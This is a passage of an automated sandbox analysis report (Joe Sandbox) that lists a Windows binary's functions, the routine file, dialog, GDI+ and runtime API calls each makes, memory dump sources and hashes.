Opcode Fuzzy Hash: 3d54aebfe0ebaf09ea26d41923ccf7e4fe9f8173af0ae50eddec86005c1dad57
Instruction Fuzzy Hash: 3AF0C231241205FAAB313A26DC81B6F27289F917E8F15012BF824A71A1DB70CD00A3BE

Function 00C726BD Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,?,00C724F3,?,?), ref: 00C726D1
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,?,00C724F3,?,?), ref: 00C72702

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: efe6c84b17b95821365cbfb999974b71b682083fa0e320c77a2123bbfe29b519
Instruction ID: 6990f16283b5e68b6cb6918a82d6b6e2d173bd69ebc917797376f794c0f2d10f
Opcode Fuzzy Hash: efe6c84b17b95821365cbfb999974b71b682083fa0e320c77a2123bbfe29b519
Instruction Fuzzy Hash: 55F030352412096BDF116F60ED85FED77ACFB043C1F488055BD889A161DB32DA99AB90

Function 00C80F2C Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00C80F5A
SetDlgItemTextW.USER32(00000065,?), ref: 00C80F71

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: c446124758bc7207e88c7983da6b86738dc0db74f6c27713a2fea65399cc05d0
Instruction ID: b0b30cb5b9e53b95e23e136b965d1f570cf3f7a427fd6339dea7481b68d95ab0
Opcode Fuzzy Hash: c446124758bc7207e88c7983da6b86738dc0db74f6c27713a2fea65399cc05d0
Instruction Fuzzy Hash: 0AF0EC7195434836EB11FBB09C07FAE375C9704785F1441D6FB04520E2D9715A15A766

Function 00C72397 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,00C71C61,?,?,00C71A78), ref: 00C723A8
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00C71C61,?,?,00C71A78), ref: 00C723D6

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e05408df693fbca919a92b6dc0b330bddf4a6428f390152f67831e05c65195f7
Instruction ID: 185df3a79470343bc6366ea3b7a112dbaffd9e402966683f3ec22c90b1a5e6d7
Opcode Fuzzy Hash: e05408df693fbca919a92b6dc0b330bddf4a6428f390152f67831e05c65195f7
Instruction Fuzzy Hash: A3E09B316401085BDB015F61DC45BED77ACFF043C1F488065BD88C3161DB31DD94ABA0

Function 00C723FE Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00C7240F
GetFileAttributesW.KERNELBASE(?,?,?,00000800), ref: 00C7243B

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d40571af818887c30dc56f7451870152f5cebbcec1ab75e27b25390c14c96ca9
Instruction ID: 4abd779782f95438d31011b8382c91490b646109cdabcef9e53bbfdb4428e828
Opcode Fuzzy Hash: d40571af818887c30dc56f7451870152f5cebbcec1ab75e27b25390c14c96ca9
Instruction Fuzzy Hash: A3E092359011285BCB11AB68DC09BE97BACAB087E1F0442A1FD6CD32A1D6719E849BD0

Function 00C75E92 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 7d209009cd58b10bc5fca1e03ce13c7d8bcb608d92ce5f15253f581c28306797
Instruction ID: 461b4e561a25ebb34700973a221e5d9df1bf967332e2dcfb866b3e084e10dc15
Opcode Fuzzy Hash: 7d209009cd58b10bc5fca1e03ce13c7d8bcb608d92ce5f15253f581c28306797
Instruction Fuzzy Hash: 11E0487690015C6BDB11AB94DC09FEB77ACEF0C3D1F0440A6BA4CD2004DAB5DA509BF0

Function 00C7D85A Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7D87B
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C7D882

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 2b1aca8a0982b6035731bf7ed354b71cf7ba88181897dfa2277183c07a8e62e0
Instruction ID: 91ac4430b7ec228f0feb4c4e93263085b48bf17aab759c7393354c230d46661d
Opcode Fuzzy Hash: 2b1aca8a0982b6035731bf7ed354b71cf7ba88181897dfa2277183c07a8e62e0
Instruction Fuzzy Hash: A4E06DB1910208EBCB10EF89C900BA9B7FCEF05350F10805AE88993340E670AE40AB95

Function 00C7DFD4 Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,00C942B1,000000FF), ref: 00C7DFFD
OleUninitialize.OLE32(?,?,?,00C942B1,000000FF), ref: 00C7E002

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 6260e1549b44a31d6dac1790c4b66139171ec77884cfa6ef53d68045935a1703
Instruction ID: d3d985ffb4ea31bb6a6b0088bfa0b15c5f906ce820ca92df905813e426ccf3b2
Opcode Fuzzy Hash: 6260e1549b44a31d6dac1790c4b66139171ec77884cfa6ef53d68045935a1703
Instruction Fuzzy Hash: 15E01A76944A449FC720DF48D845B69B7ECFB09B20F04476AB81993B50DB346801CB91

Function 00C859F0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00C8698A: try_get_function.LIBVCRUNTIME ref: 00C8699F

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C85A0E
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C85A19

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 90a000e232c4544e477b37df6751bbe3e3f26ec64719224b97f65abb3473a3c2
Instruction ID: a62c5b4fe602f7e117724b7aaf7e45a2e994b9ea578de42b035025366a3d888a
Opcode Fuzzy Hash: 90a000e232c4544e477b37df6751bbe3e3f26ec64719224b97f65abb3473a3c2
Instruction Fuzzy Hash: C4D0A928824F0298C80C367428C72FA23889A127BC3A053ABE4208A1C2EBA18002332D

Function 00C7115B Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00C71170
ShowWindow.USER32(00000000), ref: 00C71177

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 2513947d036aa7cabdebdc29ffb965b428eeef810d26dfc7a76c6dd66a2beca3
Instruction ID: 1282f53d30142a1a915238024df4e8e4f03af1f866d2f3469a07525b2764da24
Opcode Fuzzy Hash: 2513947d036aa7cabdebdc29ffb965b428eeef810d26dfc7a76c6dd66a2beca3
Instruction Fuzzy Hash: 9BC01236158140BECB014B70EC0DE2E7BA8AB95211F15C919B0B9C1060C638C010EB11

Function 00C7113D Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00C7114B
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00C71152

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CallbackDispatcherItemUser
String ID:
API String ID: 4250310104-0
Opcode ID: 1a968d2df2e047b2f59cf566f3379b33c95036d1ec4da875189e52b63e235501
Instruction ID: 737199473d55e459165b6b91b3554aba23ca506d4c08dfdc757263688862c96b
Opcode Fuzzy Hash: 1a968d2df2e047b2f59cf566f3379b33c95036d1ec4da875189e52b63e235501
Instruction Fuzzy Hash: 68C04C76408280FFCB015BA1AD0CE2FBFA9AB95321F14C81EB5ADC0430CA358421EB11

Function 00C7E2F9 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C7E2FE

Part of subcall function 00C71D7B: CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000), ref: 00C71DFB
Part of subcall function 00C71D7B: GetLastError.KERNEL32(?,?,00000000,00000003,-00000001,00000000), ref: 00C71E08
Part of subcall function 00C71D7B: CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E3D
Part of subcall function 00C71D7B: GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E45

Part of subcall function 00C720FB: SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00C72131
Part of subcall function 00C720FB: GetLastError.KERNEL32 ref: 00C7213D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorFileLast$Create$H_prologPointer
String ID:
API String ID: 3930172495-0
Opcode ID: be2df6da6264735e0ef0aa0c397b13ab5bdb48ce57e609834d90a3ba982a9f49
Instruction ID: f47806c28b6bb19cba45963bc61e66903fccd8c177569a325f7b22e29b8dfd76
Opcode Fuzzy Hash: be2df6da6264735e0ef0aa0c397b13ab5bdb48ce57e609834d90a3ba982a9f49
Instruction Fuzzy Hash: 4C41F5729005559FCB34EF68CC91AFB73B8AF49394F0080ADF86A97255EB709E44DB60

Function 00C80B3E Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C80B43

Part of subcall function 00C7C79C: __EH_prolog.LIBCMT ref: 00C7C7A1

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 05045aa9776fa2b40b62668b82343fcaf69be65a624ac0a3e35b80d1030056f6
Instruction ID: cc1abc1306dac3d6666b5ab14a934e88153b2434b04365ef9c0ec1095382d125
Opcode Fuzzy Hash: 05045aa9776fa2b40b62668b82343fcaf69be65a624ac0a3e35b80d1030056f6
Instruction Fuzzy Hash: 3E012875504380EFDB15AF64EC12FAC7FA4D715314F14805FF40496292DAB21944EB25

Function 00C71CFA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C71CFF

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cf76e61d4a915e5e09786b9c8445d380571a9bfc506c10b7ab3a170953d334b5
Instruction ID: b3ed511b58d656a917dfb098231327189899175f071fe54d1b84216572ce214b
Opcode Fuzzy Hash: cf76e61d4a915e5e09786b9c8445d380571a9bfc506c10b7ab3a170953d334b5
Instruction Fuzzy Hash: D1F049B5A001148FDB18EF6CD40996EB7F8EF88710B1145AEF815D3341EAB09D028BA5

Function 00C8A838 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ecf0acad31a95a3f1487e59f7635167619d5847917d32189b187be3eb53cd37
Instruction ID: 146f29d875842ba8e0d27fed98446e8bce39fc746d20bb1c33561c694a2b311c
Opcode Fuzzy Hash: 1ecf0acad31a95a3f1487e59f7635167619d5847917d32189b187be3eb53cd37
Instruction Fuzzy Hash: 74E065315025219BF62137A69C05B5F3648AB523A8F154133AC25961E5DB50CD0257FF

Function 00C71AF3 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00C71A7F), ref: 00C71B0E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 12b45b037a1cbe376f4750f4d9e2f69245848d01591bdc72da40753a8b07cc08
Instruction ID: 7c76d9739e978cca4bcbc8b502253eea6c4c3571e63671c0794965d6eb67dbe8
Opcode Fuzzy Hash: 12b45b037a1cbe376f4750f4d9e2f69245848d01591bdc72da40753a8b07cc08
Instruction Fuzzy Hash: F3F089B0552B444FDB308A28D549792B7E49B11731F08D71ED8FA435D0D361954DDF50

Function 00C7273F Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C7276E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 23c38f0cfb7ca1eb626ca15908d40d6f816011e822dac7b2fe671a106c8d6915
Instruction ID: 88386e226758fd7961f91f3f87b9576a4f540d3ed162384cba1ae9de14344a8a
Opcode Fuzzy Hash: 23c38f0cfb7ca1eb626ca15908d40d6f816011e822dac7b2fe671a106c8d6915
Instruction Fuzzy Hash: C0F08231408780ABCA225BB58904BCABF905F15371F04CA4DF1FD12196C2755099AB22

Function 00C7DA9B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00C7DAA1

Part of subcall function 00C7D85A: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7D87B

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 73fc65fd507a11d81bb0781ba5467f7cec507a30a4b4418ed8191bf2960411f0
Instruction ID: 2029caadcf2c4fc82bb24223d2c0e42af4a94b604b006798d3c90483468328d9
Opcode Fuzzy Hash: 73fc65fd507a11d81bb0781ba5467f7cec507a30a4b4418ed8191bf2960411f0
Instruction Fuzzy Hash: 71D0A73021420CBBDF41BB71CC02A7A7AA8EF10350F00C029BC0A85281F971DF11B295

Function 00C80DD3 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00C76B3E), ref: 00C80DF8

Part of subcall function 00C7E7E2: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7E7F3
Part of subcall function 00C7E7E2: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7E804
Part of subcall function 00C7E7E2: TranslateMessage.USER32(?), ref: 00C7E80E
Part of subcall function 00C7E7E2: DispatchMessageW.USER32(?), ref: 00C7E818

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

